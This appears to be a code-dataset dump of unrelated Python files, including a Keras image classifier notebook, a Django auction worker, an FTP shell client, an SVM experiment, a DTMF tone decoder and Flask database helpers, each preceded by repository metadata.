gc.collect()
# Next, we will calculate the mean and standard deviation.
# In[34]:
mean_img = X_train.mean(axis=0)
# In[35]:
std_dev = X_train.std(axis = 0)
# Next, we will normalize the image data using the following formula:
#
# <center>** X = (x - mean of x)/(std. deviation of x)**<center/>
#
# In[36]:
X_norm = (X_train - mean_img)/ std_dev
# In[37]:
X_norm.shape
# In[38]:
del X_train
# In[39]:
gc.collect()
# In[40]:
y = train[label_cols].values
# In[41]:
from sklearn.model_selection import train_test_split
# Finally, we create the training and validation sets.
# In[42]:
Xtrain, Xvalid, ytrain, yvalid = train_test_split(X_norm, y, test_size=0.05, random_state=47)
# In[43]:
del X_norm
gc.collect()
# ### Model Architecture
#
# We will be using the Keras framework to create our model. But you may also use other frameworks like Tensorflow, Pytorch, etc.
# In[44]:
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D, BatchNormalization
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras import backend as K
print(K.image_data_format(),Xtrain.shape)
# For this problem, we create a model from scratch. We will use a Sequential model, which is a linear stack of layers to build this model.
# In[45]:
input_shape = Xtrain.shape[1:]
gc.collect()
# In[46]:
model = Sequential()
model.add(BatchNormalization(input_shape=Xtrain.shape[1:]))
#model.add(Conv2D(32, kernel_size=(3, 3), activation= 'relu', input_shape=input_shape))
model.add(Conv2D(32, kernel_size=(3, 3), activation= 'relu'))
model.add(Conv2D(64, kernel_size=(3, 3), activation= 'relu', padding='same'))
model.add(Conv2D(64, kernel_size=(3, 3), activation= 'relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.25))
model.add(Conv2D(128, kernel_size=(3, 3), activation= 'relu', padding='same'))
model.add(Conv2D(128, kernel_size=(3, 3), activation= 'relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dropout(0.5))
model.add(Dense(85, activation='sigmoid'))
# Here we generate the summary our model. We can see that there are approximately 10 million parameters to train.
# In[47]:
model.summary()
# Next, we define our loss function, the optimizer and metrics for our model.
# In[48]:
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# In[49]:
early_stops = EarlyStopping(patience=3, monitor='val_acc')
checkpointer = ModelCheckpoint(filepath='weights.best.eda.hdf5', verbose=1, save_best_only=True)
# Finally, we train our model.
# In[50]:
model.fit(Xtrain, ytrain, validation_data=(Xvalid, yvalid), epochs=47, batch_size=32, callbacks=[checkpointer], verbose=1)
# In[52]:
train_pred = model.predict(Xtrain).round()
# In[53]:
from sklearn.metrics import f1_score
f1_score(ytrain, train_pred, average='samples')
# In[54]:
valid_pred = model.predict(Xvalid).round()
# In[56]:
f1_score(yvalid, valid_pred, average='samples')
# In[58]:
#del Xtrain
#del Xvalid
#del ytrain
#del yvalid
gc.collect()
# ### Prediction on Test Set
#
# Now that we have built and trained our model, we will use it to predict the labels of the test images.
# In[51]:
from sklearn.metrics import f1_score
# In[59]:
test_img = []
for img_path in tqdm(test.Image_name.values):
test_img.append(read_img(TEST_PATH + img_path))
# In[60]:
X_test = np.array(test_img, np.float32) / 255.
# In[61]:
del test_img
gc.collect()
# The test images are normalized below.
# In[62]:
mean_img = X_test.mean(axis=0)
# In[63]:
std_dev = X_test.std(axis = 0)
# In[64]:
X_norm_test = (X_test - mean_img)/ std_dev
# In[65]:
del X_test
gc.collect()
# Predict the labels on the test images.
# In[66]:
model.load_weights('weights.best.eda.hdf5')
# In[67]:
pred_test = model.predict(X_norm_test).round()
# In[68]:
pred_test = pred_test.astype(np.int)
# #### Creating the submission file
# In[70]:
subm = pd.DataFrame()
# In[71]:
subm['Image_name'] = test.Image_name
# In[72]:
label_df = pd.DataFrame(data=pred_test, columns=label_cols)
# In[73]:
subm = pd.concat([subm, label_df], axis=1)
# In[74]:
subm.to_csv('submit.csv', index=False)
# END.....
| true |
a60ad21c6c1e4e5996e8f2d46dc6f365f2942ab2 | Python | danoc93/auctioneer | /worker/auction/complete_bids.py | UTF-8 | 1,489 | 2.6875 | 3 | [] | no_license | import time
from django.db.models import Max
from django.utils import timezone
from auctions.models.Auction import Auction
from auctions.models.AuctionStatus import AuctionStatusOption, AuctionStatus
from auctions.models.Bid import Bid
"""
This worker fulfills expired auctions and declares winner bids.
"""
def complete_bids():
i = 0
while i < 10:
check_bids()
time.sleep(5)
i += 1
def check_bids():
print('Finding all expired auctions @', timezone.now())
auctions = Auction.objects.filter(
status__value=AuctionStatusOption.OPEN.value,
expiration_time_utc__lte=timezone.now()
)
if len(auctions) == 0:
print('No unfulfilled auctions found')
return
new_status = AuctionStatus.objects.filter(value=AuctionStatusOption.FULFILLED.value).first()
for auction in auctions:
auction.status = new_status
auction.save()
winning_bid_amount = Bid.objects.aggregate(Max('bid_amount'))['bid_amount__max']
winning_bid = Bid.objects.filter(
auction=auction, bid_amount=winning_bid_amount
).order_by('bid_time_utc').first()
if winning_bid:
winning_bid.is_winning_bid = True
winning_bid.save()
print('Bid {} set as winner for auction {}'.format(winning_bid.id, auction.id))
# Here we could potentially email people.
else:
print('Auction {} has no winning bid'.format(auction.id))
| true |
757ef75b06d8738f21402d8f7fdfad06b0f83fe2 | Python | rcsraymer/Project_Euler | /001.py | UTF-8 | 517 | 4.4375 | 4 | [] | no_license | # Question
# If we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.
# Find the sum of all the multiples of 3 or 5 below 1000.
# Solution
# Use the modulus operator to find where i in range of 1000 has no remainder when divisible by 3 or 5
# Add only those values to a list
# Sum the list
lst = []
for i in range(1000):
if ((i % 3 == 0) or (i % 5 == 0)):
lst.append(i)
print(sum(lst))
## 233168 is the sum | true |
029b3e03fec3863fa9165a04b0817df2922a7e85 | Python | Aayushs1602/memes | /table of 69.py | UTF-8 | 38 | 2.953125 | 3 | [] | no_license | for i in range(1,11):
print(69 * i)
| true |
2387eb6a5b9fa886b6f764da99bd24c0290f1684 | Python | Git-Clarusway/CaseStudy | /CS-8/ValidateCS.py | UTF-8 | 1,473 | 3.671875 | 4 | [] | no_license | # Customer should be checked for customer's name,
# customer's username, and customer's birthday.
# users database - a particular index corresponds to a specific user
# users database - a particular index corresponds to a specific user
names = ["James", "John", "Emma"]
surnames = ["Oliver", "Smith", "Brown"]
birth_days = [15, 22, 8]
birth_months = [3, 6, 12]
birth_years = [1984, 1994, 2001]
while True:
try:
name=input('Please enter your name : ').title()
if name in names:
user_id=names.index(name)
surname=input('Please enter your surname : ').title()
info=surnames[user_id],birth_months[user_id],birth_days[user_id],birth_years[user_id]
if surname in info:
u_date=input('Please enter your birthday (MM/DD/YYYY) ')
u_month,u_day,u_year=u_date.split('/')
if len(u_month+u_day+u_year) == 8:
if int(u_month) in info and int(u_day) in info and int(u_year) in info:
print('You are a costumer')
break
else:
print('You are not a costumer')
else:
print('You have entered an incorrect value!')
else:
print('You are not a costumer')
else:
print('You are not a costumer')
except:
print('You have entered an incorrect value!') | true |
97cbd1756c3dd4f62cc10a1bf09aa2fff5a09b4b | Python | decoejz/cFProj2 | /DTMF/recebe.py | UTF-8 | 2,323 | 3 | 3 | [] | no_license | from signalTeste import *
import numpy as np
import sounddevice as sd
import matplotlib.pyplot as plt
#import wave
import time
#import pickle
import peakutils
from peakutils.plot import plot as pplot
#frequências possíveis
freq1 = 1209
freq2 = 1336
freq3 = 1477
freq4 = 697
freq5 = 770
freq6 = 852
freq7 = 941
#soma de freqências - correspondência com as teclas
um = freq4 + freq1
dois = freq4 + freq2
tres = freq4 + freq3
quatro = freq5 + freq1
cinco = freq5 + freq2
seis = freq5 + freq3
sete = freq6 + freq1
oito = freq6 + freq2
nove = freq6 + freq3
zero = freq7 + freq2
#lista das possíveis frequências
numbers = [freq1,freq2,freq3,freq4,freq5,freq6,freq7]
#Lista da soma das frequências
totals = [zero, um, dois, tres, quatro, cinco, seis, sete, oito, nove]
looping = True
while looping:
# print("entrou no looping")
# Frequência e duração
fs = 44100
cont = np.linspace(0, 88200, 88200)
duration = 2 # seconds
#Gravação de sinal
dirtySignal = sd.rec(int(duration * fs), samplerate=fs, channels=1)
sd.wait()
#time.sleep(1)
#limpa o sinal -- correção do erro da placa de audio
dirtySignal = dirtySignal[:,0]
# sd.play(dirtySignal, fs)
#Objeto da classe para calculo da FFT
sig = signalMeu()
freq, t = sig.calcFFT(dirtySignal,fs)
#Encontrando a posição dos picos
indexes = peakutils.indexes(t, thres=3, min_dist=70)
#Picos - lista
peaks_x = peakutils.interpolate(freq,t, ind=indexes)
print("picos: ", peaks_x)
#inicio de lista de picos certos
anser = []
#Quando encontrarmos apenas 2 picos adicionar a anser o valor
if len(peaks_x) == 2:
for i in numbers:
if abs(i - peaks_x[0]) < 2:
anser.append(i)
elif abs(i - peaks_x[1]) < 2:
anser.append(i)
#somar os valores para fazer a comparação
total = anser[0] + anser[1]
#Confere para ver se o valor obtido na soma é um valor que existe na lista de números e printa o número encontrado.
if total in totals:
tecla = totals.index(total)
print("Tecla pressionad: ", tecla)
#Gráfico do sinal sonoro recebido
plt.plot(cont,dirtySignal)
plt.title("Sinal recebido")
plt.show()
#Plota o gráfico com as frequências e os picos
pplot(freq, t, indexes)
plt.title('Frequências')
plt.show()
#Tudo certo podemos sair do loop
looping = False
| true |
a63b5ee8331de090c005be527ea0bb46b91c755e | Python | JavierLopatin/Python-Remote-Sensing-Scripts | /Rasterize.py | UTF-8 | 1,122 | 2.71875 | 3 | [] | no_license | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
C
Rasterize all shapefile columns into a multiband raster
reated on Sat Dec 5 11:44:50 2020
@author: Javier Lopatin
"""
import geopandas as gpd
from geocube.api.core import make_geocube
import argparse
# create the arguments for the algorithm
parser = argparse.ArgumentParser()
parser.add_argument('-i','--inputShapefile',
help='Input raster', type=str, required=True)
parser.add_argument('-r','--resolution',
help='Output resolution', type=float)
parser.add_argument('-p','--preprop',
help='Resolution in a tuple, e.g. (-5, 5) for a 5X5 m pixels.',
action="store_true", default=False)
parser.add_argument('--version', action='version', version='%(prog)s 1.0')
args = vars(parser.parse_args())
# data imputps/outputs
inData = args["inputShapefile"]
res = args["resolution"]
outraster = inData[:-4]+'_raster.tif'
# load shapefile
s = gpd.read_file(inData)
# rasterize
print("Rasterizing...")
out_grid = make_geocube(vector_data=s, resolution=(-res, res))
print('Done!')
# save to disk
print('Saving to disk...')
out_grid.rio.to_raster(outraster)
print('Done!')
| true |
5c06bab21cdd98108e5d574f700f84d6fc3fd028 | Python | nex3z/think-bayes-playground | /c2/Monty.py | UTF-8 | 385 | 2.5625 | 3 | [] | no_license | from common.Pmf import Pmf
class Monty(Pmf):
def likelihood(self, data, hypo):
if hypo == data:
return 0
elif hypo == 'A':
return 0.5
else:
return 1
def update(self, data):
for hypo in self.values():
like = self.likelihood(data, hypo)
self.mult(hypo, like)
self.normalize()
| true |
4cb236b2b80a8d0f83219bbdd5d70e9b373d365b | Python | AdamZhouSE/pythonHomework | /Code/CodeRecords/2973/59140/290174.py | UTF-8 | 546 | 3.015625 | 3 | [] | no_license | def permutation(s_list, start, last):
if start >= last:
sets.append("".join(s_list))
else:
for i in range(start, last):
s_list[i], s_list[start] = s_list[start], s_list[i]
permutation(s_list, start + 1, last)
s_list[i], s_list[start] = s_list[start], s_list[i]
message = input()
n = int(input())
sum = 0
for i in range(0, n):
sets = []
key = input()
permutation(list(key), 0, len(key))
sets=list(set(sets))
for j in sets:
sum += message.count(j)
print(sum) | true |
c153f86643770d306279ac1a30efa287124eda0b | Python | vinismarques/codigos-python | /gerenciamento_bancario.py | UTF-8 | 890 | 3.875 | 4 | [] | no_license | class Cliente:
def __init__(self, nome, cpf, idade):
self.nome = nome
self.cpf = cpf
self.idade = idade
def __str__(self):
return f'Nome: {self.nome}, CPF: {self.cpf}, Idade: {self.idade}'
class Conta():
def __init__(self, cliente, saldo):
self.cliente = cliente
self.saldo = saldo
def sacar(self, valor):
self.saldo -= valor
def depositar(self, valor):
self.saldo += valor
def consultarSaldo(self):
return self.saldo
vinicius = Cliente('Vinicius', '027242', '25')
conta = Conta(vinicius, 390)
# print(vinicius.nome, vinicius.cpf, vinicius.idade)
# print(f'Nome: {vinicius.nome}, CPF: {vinicius.cpf}, Idade: {vinicius.idade}')
print(vinicius)
conta.depositar(10)
conta.sacar(390.5)
print(f'Cliente {conta.cliente.nome} tem R$ {conta.consultarSaldo() :.2f}'
f' em sua conta')
| true |
63b0df9ad4eb2705c1d69f5a5c2ac7d35e12e83f | Python | aoeuidht/homework | /leetcode/palindrome_number.py | UTF-8 | 722 | 3.546875 | 4 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
"""Determine whether an integer is a palindrome. Do this without extra space.
"""
class Solution:
# @return a boolean
def isPalindrome(self, x):
if x < 0:
return False
i = 0
_x = x
while _x > 0:
_x /= 10
i += 1
_x = i / 2
i -= 1
while _x > 0:
if (x % 10) == (x / (10 ** i)):
x = x % (10 ** i)
x /= 10
_x -= 1
i -= 2
else:
break
return True if _x < 1 else False
if __name__ == '__main__':
s = Solution()
print s.isPalindrome(int(sys.argv[1]))
| true |
a7110115a79554d22d3e20dbe44f8ad466bef608 | Python | filhit/dsoulstest_server_modpack | /dumpnodes/avgcolors.py | UTF-8 | 670 | 3.09375 | 3 | [] | no_license | #!/usr/bin/env python3
import sys
from math import sqrt
from PIL import Image
if len(sys.argv) < 2:
print("Prints average color (RGB) of input image")
print("Usage: %s <input>" % sys.argv[0])
exit(1)
inp = Image.open(sys.argv[1].split()[0]).convert('RGBA')
ind = inp.load()
cl = ([], [], [])
for x in range(inp.size[0]):
for y in range(inp.size[1]):
px = ind[x, y]
if px[3] < 128: continue # alpha
cl[0].append(px[0]**2)
cl[1].append(px[1]**2)
cl[2].append(px[2]**2)
if len(cl[0]) == 0:
print("Didn't find average color for %s" % sys.argv[1], file=sys.stderr)
print("0 0 0")
else:
cl = tuple(sqrt(sum(x)/len(x)) for x in cl)
print("%d %d %d" % cl)
| true |
73da54e401643de521bd4314b566aefd71062d11 | Python | litvinchuck/python-workout | /ftp.py | UTF-8 | 5,795 | 3.09375 | 3 | [
"MIT"
] | permissive | """A minimalistic FTP util. A shell client for Python ftplib
getwelcome - Return the welcome message sent by the server in reply to the initial connection. (This message sometimes
contains disclaimers or help information that may be relevant to the user.)
connect [host=''] [port=0] [timeout=None] - Connect to the given host and port. The default port number is 21, as
specified by the FTP protocol specification. It is rarely needed to specify a different port number. This function
should be called only once for each instance; it should not be called at all if a host was given when the instance was
created. All other methods can only be used after a connection has been made. The optional timeout parameter specifies
a timeout in seconds for the connection attempt. If no timeout is passed, the global default timeout setting will be
used.
login [user='anonymous'] [passwd=''] [acct=''] - Log in as the given user. The passwd and acct parameters are optional
and default to the empty string. If no user is specified, it defaults to 'anonymous'. If user is 'anonymous', the
default passwd is 'anonymous@'. This function should be called only once for each instance, after a connection has been
established; it should not be called at all if a host and user were given when the instance was created. Most FTP
commands are only allowed after the client has logged in. The acct parameter supplies “accounting information”;
few systems implement this.
set_debuglevel [level] - Set the instance’s debugging level. This controls the amount of debugging output printed. The
default, 0, produces no debugging output. A value of 1 produces a moderate amount of debugging output, generally a
single line per request. A value of 2 or higher produces the maximum amount of debugging output, logging each line sent
and received on the control connection.
nlst [directory] - Return a list of file names as returned by the NLST command. The optional argument is a directory to
list (default is the current server directory). Multiple arguments can be used to pass non-standard options to the NLST
command.
dir [directory] - Produce a directory listing as returned by the LIST command, printing it to standard output. The
optional argument is a directory to list (default is the current server directory).
cwd [pathname] - Set the current directory on the server.
mkd [pathname] - Create a new directory on the server.
pwd - Return the pathname of the current directory on the server.
rmd [dirname] - Remove the directory named dirname on the server.
size [filename] - Request the size of the file named filename on the server. On success, the size of the file is
returned as an integer, otherwise None is returned. Note that the SIZE command is not standardized, but is supported by
many common server implementations.
rename [fromname] [toname] - Rename file fromname on the server to toname.
delete [filename] - Remove the file named filename from the server. If successful, returns the text of the response.
retrieve [filename] [destination] - Retrieve a file in binary transfer mode and save it to destination folder.
store [filename] [origin] - Store a file located in origin using binary transfer mode.
quit - Send a QUIT command to the server and close the connection.
exit - Send a QUIT command to the server and close the connection. Same as quit.
close - Send a QUIT command to the server and close the connection. Same as quit.
help - display help
"""
import os
import sys
from ftplib import FTP, error_perm, all_errors
from getpass import getpass
from ftp.ftptracker import FTPTracker
try:
import gnureadline as readline
except ImportError:
readline = None
try:
import readline
except ImportError:
pass
print("FTP util\n")
host = input("Enter FTP hostname: ").replace('http://', '').replace('ftp://', '')
user = input("Enter username: ")
password = getpass("Enter password: ")
try:
ftp = FTP(host)
except all_errors as error:
print(error)
input()
sys.exit()
else:
print(ftp.getwelcome())
try:
print(ftp.login(user, password))
except error_perm as error:
print(error)
input()
sys.exit()
if readline:
readline.set_startup_hook() # Enables input history
while True:
try:
user_input = input(">> ").split(" ")
command = user_input[0]
arguments = user_input[1:]
if command in ('exit', 'quit', 'close'):
print(ftp.quit())
sys.exit()
elif command == 'help':
print(__doc__)
elif command == 'retrieve':
tracker = FTPTracker(ftp.size(arguments[0]))
if len(arguments) < 2:
arguments.append(arguments[0])
with open(arguments[1], 'wb') as file:
print(ftp.retrbinary('RETR {}'.format(arguments[0]),
lambda block: (file.write(block), tracker.handle(block))))
elif command == 'store':
tracker = FTPTracker(os.path.getsize(arguments[0]))
if len(arguments) < 2:
arguments.append(arguments[0])
with open(arguments[1], 'rb') as file:
print(ftp.storbinary('STOR {}'.format(arguments[0]), file, callback=tracker.handle))
elif not command:
continue
else:
func = getattr(ftp, command)
arguments = list(map(lambda argument: int(argument) if argument.isdigit() else argument, arguments))
result = func(*arguments)
if result:
print(result)
except all_errors as error:
print(error)
except (TypeError, IndexError):
print('Invalid amount of arguments')
except AttributeError:
print('Unknown command: "{}"'.format(command))
| true |
7ac59e6226556a4896f2695c2efdfe84ab408af2 | Python | sherry-roar/Roar | /mysvm.py | UTF-8 | 6,619 | 2.78125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
# -*- coding:utf-8 -*-
__author__ = 'Mr.R'
import numpy as np
from sklearn import svm
from sklearn.model_selection import KFold
# import sklearn
import matplotlib.pyplot as plt
# import pylab as pl
import time
np.random.seed(1)
sample_num=1000
t='nonlinear'
k=5
c=[1e-7,1e-5,1e-3,1e-1]
def generator(n, t):
X = 10*np.random.random((n, 2))
Y = np.zeros(n)
if t == 'linear':
Y = np.where(X[:, 0] - X[:, 1] > 0, 1,-1)
if t == 'nonlinear':
Y = np.where((X[:, 0]-4)**2 + X[:, 1]-8 >0 , 1, -1)
return X, Y
def cross_va(X,Y,k,i):
# k fold cross validate model
data=np.column_stack((X,Y))
np.random.seed(5)
np.random.shuffle(data)
# m,n=np.shape(X)
# start=(i-1)/k*m
# end=(i*m/k)
# sl=slice(0,20,1)
# data_train=data[sl,:]
kf = KFold( n_splits=k, shuffle=False)
kf.get_n_splits(data)
for (train_index, test_index) in kf.split(X):
# print("TRAIN:", train_index, "TEST:", test_index)
X_train, X_test = X[train_index], X[test_index]
Y_train, Y_test = Y[train_index], Y[test_index]
# print(X_train, X_test)
# print(Y_train, Y_test)
return X_test,X_train,Y_test,Y_train
def show_acc(y_hat,y,t):
num=np.shape(y)
err=sum(y_hat-y)
acc=err/num
if t=='train':
print('train accuracy=',acc)
if t=='test':
print('test accuracy=', acc)
def plot_scatter(x, y , t):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_title(t)
plt.xlabel('x')
plt.ylabel('y')
idx_1 = np.where(y == 1)
p1 = ax.scatter(x[idx_1, 0], x[idx_1, 1],
marker='o', color='g', label=1, s=20)
idx_2 = np.where(y == -1)
p2 = ax.scatter(x[idx_2, 0], x[idx_2, 1],
marker='x', color='r', label=2, s=20)
plt.legend(loc='upper right')
plt.draw()
plt.pause(3)
plt.close()
def plot_line(x,y, tt):
fig = plt.figure()
ax = fig.add_subplot(111)
plt.xlabel('x')
plt.ylabel('y')
ax.set_title(tt)
idx_1 = np.where(y == 1)
p1 = ax.scatter(x[idx_1, 0], x[idx_1, 1],
marker='o', color='g', label=1, s=20)
idx_2 = np.where(y == -1)
p2 = ax.scatter(x[idx_2, 0], x[idx_2, 1],
marker='x', color='r', label=2, s=20)
if t=='linear' :
line_x = np.arange(0, 10, 0.1)
line_y = line_x
p3 = ax.plot(line_x, line_y, label="line")
elif t=='nonlinear':
line_x = np.arange(1, 7, 0.1)
line_y = -(line_x-4)**2+8
p3 = ax.plot(line_x, line_y, label="line")
plt.legend(loc='upper right')
plt.draw()
plt.pause(3)
plt.close()
def svm_test(x_train, x_test, y_train, y_test,c):
# X, Y is training data,c is Penalty factor
clf=svm.SVC(C=c,kernel='rbf',decision_function_shape='ovo')
clf.fit(x_train,y_train)
train_acc=clf.score(x_train, y_train)
test_acc=clf.score(x_test, y_test)
# print('train accuracy=', train_acc) # 精度
# y_hat_train = clf.predict(x_train)
# plot_line(x_train, y_hat, 'train')
# show_acc(y_hat, y_train, 'train')
# print('test accuracy=',test_acc)
y_hat_test = clf.predict(x_test)
# plot_line(x_test, y_hat, 'test')
# show_acc(y_hat, y_test, 'test')
total_acc=(train_acc+test_acc)/2
# w = clf.coef_[0]
# a = -w[0] / w[1]
# b=clf.intercept_[0]
# xx = np.linspace(-5, 5)
# yy = a * xx - intercept / w[1]
# plot the parallels to the separating hyperplane that pass through the support vectors
# a=clf.support_vectors_[:]
# b = clf.support_vectors_[0]
# yy_down = a * xx + (b[1] - a * b[0])
# b = clf.support_vectors_[-1]
# yy_up = a * xx + (b[1] - a * b[0])
# print("w: ", w)
# print("a: ", a)
# print "xx: ", xx
# print "yy: ", yy
# print("support_vectors_: ", clf.support_vectors_)
# print("clf.coef_: ", clf.coef_)
# plot the line, the points, and the nearest vectors to the plane
# pl.plot(xx, yy, 'k-')
# pl.plot(xx, yy_down, 'k--')
# pl.plot(xx, yy_up, 'k--')
#
# pl.scatter(clf.support_vectors_[:, 0], clf.support_vectors_[:, 1],
# s=80, facecolors='none')
# pl.scatter(X[:, 0], X[:, 1], c=Y, cmap=pl.cm.Paired)
#
# pl.axis('tight')
# pl.show()
return total_acc,w,a,b,y_hat_test
if __name__ == "__main__":
start = time.clock()
X,Y=generator(sample_num, t)
plot_line(X, Y, t)
# svm_test(X,Y)
# data=cross_va(X,Y,5,1)
data=np.column_stack((X,Y))
np.random.seed(5)
np.random.shuffle(data)
kf = KFold( n_splits=k, shuffle=False)
kf.get_n_splits(data)
# factor initiate
acc=0
a=0
b=0
w=0
for (train_index, test_index) in kf.split(X):
X_train, X_test = X[train_index], X[test_index]
Y_train, Y_test = Y[train_index], Y[test_index]
for i in c:
acct,w_t,a_t,b_t,y_hat_test=svm_test(X_train,X_test,Y_train,Y_test,i)
# print(acct)
if acc > acct :
continue
else :
acc=acct
# w,a,b=w_t,a_t,b_t
XX=X_test
YY=y_hat_test
cc=i
print('Total accuracy =',acc)
print('C =',cc)
plot_line(XX, YY, 'test')
# xx = np.linspace(1, 7)
# yy = -(w[0]/w[1]) * xx - b / w[1]
# a1 = a[0]
# yy_down = -(w[0]/w[1]) * xx + (a1[1] +(w[0]/w[1]) * a1[0])
# a2 = a[-1]
# yy_up = -(w[0]/w[1]) * xx + (a2[1] +(w[0]/w[1]) * a2[0])
#
# fig = plt.figure()
# ax = fig.add_subplot(111)
# plt.xlabel('x')
# plt.ylabel('y')
# ax.set_title('final')
# plt.plot(xx, yy, 'k-')
# plt.plot(xx, yy_down, 'k--')
# plt.plot(xx, yy_up, 'k--')
# idx_1 = np.where(YY == 1)
# p1 = ax.scatter(XX[idx_1, 0], XX[idx_1, 1],
# marker='o', color='g', label=1, s=20)
# idx_2 = np.where(YY == -1)
# p2 = ax.scatter(XX[idx_2, 0], XX[idx_2, 1],
# marker='x', color='r', label=2, s=20)
# plt.scatter(a[:, 0], a[:, 1],
# s=80, facecolors='none')
# plt.scatter(X[:, 0], X[:, 1], c=Y, cmap=plt.cm.Paired)
plt.legend(loc='upper right')
plt.draw()
plt.pause(3)
plt.close()
end = time.clock()
print('finish all in %s' % str(end - start))
| true |
a4f6108cef791f6cd7b064673023e5873ba84fba | Python | ASCIT/donut | /donut/modules/core/helpers.py | UTF-8 | 5,794 | 3 | 3 | [
"MIT"
] | permissive | import flask
import pymysql.cursors
def get_member_data(user_id, fields=None):
"""
Queries the database and returns member data for the specified user_id
or list of user_id's.
Arguments:
user_id: The member (or list of members) to look up
fields: The fields to return. If None specified, then default_fields
are used.
Returns:
result: The fields and corresponding values of member with user_id. In
the form of a dict with key:value of columnname:columnvalue.
For lists of user_id's result will be a list of dicts.
"""
all_returnable_fields = [
"user_id", "uid", "last_name", "first_name", "middle_name",
"preferred_name", "email", "phone", "gender", "gender_custom",
"birthday", "entry_year", "graduation_year", "msc", "building",
"room_num", "address", "city", "state", "zip", "country"
]
default_fields = [
"user_id", "first_name", "last_name", "email", "uid", "entry_year",
"graduation_year"
]
if fields == None:
fields = default_fields
else:
if any(f not in all_returnable_fields for f in fields):
return "Invalid field"
if not isinstance(user_id, list):
user_id = [user_id]
# edge case: user_id is empty list
if len(user_id) == 0:
return {}
query = "SELECT " + ', '.join(fields) + " FROM members WHERE "
query += ' OR '.join(["user_id=%s" for _ in user_id])
# Execute the query
with flask.g.pymysql_db.cursor() as cursor:
cursor.execute(query, user_id)
result = cursor.fetchall()
if len(result) == 0:
return {}
elif len(result) == 1:
return result[0]
return result
def get_member_list_data(fields=None, attrs={}):
"""
Queries the database and returns list of member data constrained by the
specified attributes.
Arguments:
fields: The fields to return. If None specified, then default_fields
are used.
attrs: The attributes of the members to filter for.
Returns:
result: The fields and corresponding values of members with desired
attributes. In the form of a list of dicts with key:value of
columnname:columnvalue.
"""
all_returnable_fields = [
"user_id", "uid", "last_name", "first_name", "middle_name", "email",
"phone", "gender", "gender_custom", "birthday", "entry_year",
"graduation_year", "msc", "building", "room_num", "address", "city",
"state", "zip", "country"
]
default_fields = [
"user_id", "first_name", "last_name", "email", "uid", "entry_year",
"graduation_year"
]
if fields == None:
fields = default_fields
else:
if any(f not in all_returnable_fields for f in fields):
return "Invalid field"
query = "SELECT " + ', '.join(fields) + " FROM members"
if attrs:
query += " WHERE "
query += ' AND '.join([key + "= %s" for key, value in attrs.items()])
values = [value for key, value in attrs.items()]
# Execute the query
with flask.g.pymysql_db.cursor() as cursor:
cursor.execute(query, values)
return cursor.fetchall()
def get_name_and_email(user_id):
"""
Queries the database and returns the full_name and email corresponding to the
user_id.
Arguments:
user_id: The user_id to match.
Returns:
{'full_name', 'email'}: The full_name and email of the user with the given id.
"""
query = """
SELECT full_name, email
FROM members NATURAL LEFT JOIN members_full_name
WHERE user_id = %s
"""
with flask.g.pymysql_db.cursor() as cursor:
cursor.execute(query, user_id)
return cursor.fetchone()
def get_group_list_of_member(user_id):
"""
Queries the database and returns list of groups and admin status
for a given id
Arguments:
user_id: The user_id for query.
Returns:
result: All the groups that an user_id is a part of
"""
query = """
SELECT DISTINCT group_id, group_name, control
FROM groups NATURAL JOIN positions NATURAL JOIN current_position_holders
WHERE user_id = %s
"""
with flask.g.pymysql_db.cursor() as cursor:
cursor.execute(query, [user_id])
return list(cursor.fetchall())
def set_image(user_id, extension, contents):
delete_query = 'DELETE FROM images WHERE user_id = %s'
with flask.g.pymysql_db.cursor() as cursor:
cursor.execute(delete_query, [user_id])
add_query = 'INSERT INTO images (user_id, extension, image) VALUES (%s, %s, %s)'
with flask.g.pymysql_db.cursor() as cursor:
cursor.execute(add_query, [user_id, extension, contents])
def get_preferred_name(user_id):
return get_member_data(user_id, ['preferred_name'])['preferred_name'] or ''
def get_gender(user_id):
return get_member_data(user_id, ['gender_custom'])['gender_custom'] or ''
def set_member_field(user_id, field, value):
query = 'UPDATE members SET `' + field + '` = %s WHERE user_id = %s'
with flask.g.pymysql_db.cursor() as cursor:
cursor.execute(query, [value, user_id])
def get_news():
query = 'SELECT * FROM news ORDER BY news_id DESC'
with flask.g.pymysql_db.cursor() as cursor:
cursor.execute(query)
return cursor.fetchall()
def add_news(news):
query = 'INSERT INTO news(news_text) VALUES (%s)'
with flask.g.pymysql_db.cursor() as cursor:
cursor.execute(query, news)
def delete_news(news_id):
query = 'DELETE FROM news WHERE news_id = %s'
with flask.g.pymysql_db.cursor() as cursor:
cursor.execute(query, news_id)
| true |
e37606936965b0d63c1f4c82850e0b2f26d01186 | Python | shakthi-sambas/x9115SNN | /hw/code/3/Birthday.py | UTF-8 | 1,256 | 3.59375 | 4 | [] | no_license | __author__ = 'Nakul'
"""This module contains code from
Think Python by Allen B. Downey
http://thinkpython.com
Copyright 2012 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
import random
print ("####################")
print ("Solution for Exercise 10.8")
print ("####################")
# This is the solution to 10.8 part 1
def has_duplicates(inpt):
lst = inpt[:]
lst.sort()
for counter in range (len(lst) -1 ):
if (lst[counter] == lst [counter +1]):
return True
return False
# This part contains solution to part 2 which utilizes function from part 1
def rand_bday_generate(num_of_samples):
bday = []
for counter in range (num_of_samples):
date = random.randint(1,365)
bday.append(date)
return bday
def birthday_paradox():
counter = 0
num_stud = 23
runs = 5000
for k in range (runs):
bday = rand_bday_generate(num_stud)
if has_duplicates(bday):
counter += 1
return counter
count = birthday_paradox()
print "Number of runs = 5000"
print "Number of students per run = 23"
print "Number of runs with atleast 1 match = %d" % count
print 'Chance (number of runs with matches/5000) = %s percent' % (float(count)*100.0/5000.0)
| true |
cfedc0c8ee0c4281cab88cf59743d0b58abacfb4 | Python | csdorman/My-Code-Learning | /AdventOfCode/2019/day3.py | UTF-8 | 2,157 | 3.515625 | 4 | [] | no_license |
